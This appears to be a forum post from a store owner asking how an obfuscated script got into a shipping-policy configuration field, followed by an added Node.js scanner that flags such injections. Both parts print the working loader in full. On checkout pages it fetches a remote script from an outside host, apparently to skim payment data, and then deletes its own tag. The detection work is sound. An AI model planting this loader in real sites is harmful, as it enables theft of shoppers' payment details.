We found a script like this in shipping/shipping_policy/shipping_policy_content:
<script id="shopcart">((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);a.id="carthelper";a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector("#shopcart")){document.querySelector("#shopcart").remove();}})(window,document,"script","gCaptcha","Y2hlY2tvdXQ","aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM")</script>
Which translates to https://static.webagencyanalytics.com/main.js?v=1.0.3
I’m trying to determine how this was injected, but I can’t find references to the script itself, the base64-encoded string, or the decoded string.
Any ideas how I can detect the root cause?
I’m using ModSecurity and I’m already logging GET/POST requests for this.
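An added example, not part of the original post: a Node.js check that scans stored configuration values for `<script>` tags that call `atob()` and decodes their base64 string literals, so every affected config path and the hidden trigger and URL are listed in one pass. The row format (`path`/`value` pairs exported from the store database) and the names `SAMPLE_ROWS`, `decodeB64` and `scanRows` are assumptions made for illustration.

```javascript
// Sample input. The first value is the script quoted in the post; the second row is constructed.
const SAMPLE_ROWS = [
  { path: "shipping/shipping_policy/shipping_policy_content",
    value: '<script id="shopcart">((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);a.id="carthelper";a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector("#shopcart")){document.querySelector("#shopcart").remove();}})(window,document,"script","gCaptcha","Y2hlY2tvdXQ","aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM")</script>' },
  { path: "general/store_information/name", value: "Example Store" },
];

// Decode a candidate base64 literal. Returns null unless the token looks like
// base64 (padded or unpadded) and decodes entirely to printable ASCII, which
// filters out ordinary identifiers such as "gCaptcha" or "carthelper".
function decodeB64(token) {
  if (!/^[A-Za-z0-9+/]{8,}={0,2}$/.test(token)) return null;
  const text = Buffer.from(token, "base64").toString("latin1");
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Flag every row whose value embeds a <script> tag that calls atob(), and
// report what its double-quoted string literals decode to.
function scanRows(rows) {
  const findings = [];
  for (const { path, value } of rows) {
    if (!/<script\b/i.test(value) || !/\batob\s*\(/.test(value)) continue;
    const decoded = [];
    for (const m of value.matchAll(/"([^"]*)"/g)) {
      const text = decodeB64(m[1]);
      if (text !== null) decoded.push(text);
    }
    const urls = decoded.filter((d) => /^https?:\/\//i.test(d));
    findings.push({ path, decoded, urls });
  }
  return findings;
}

// Stand-alone run: print one line per suspicious config path.
for (const f of scanRows(SAMPLE_ROWS)) {
  console.log(`${f.path}: decoded=${JSON.stringify(f.decoded)}`);
}
```

Because the loader's literals are base64 encoded, searching files or the database for the decoded URL finds nothing; matching on the `atob(` call inside stored values is what surfaces the row.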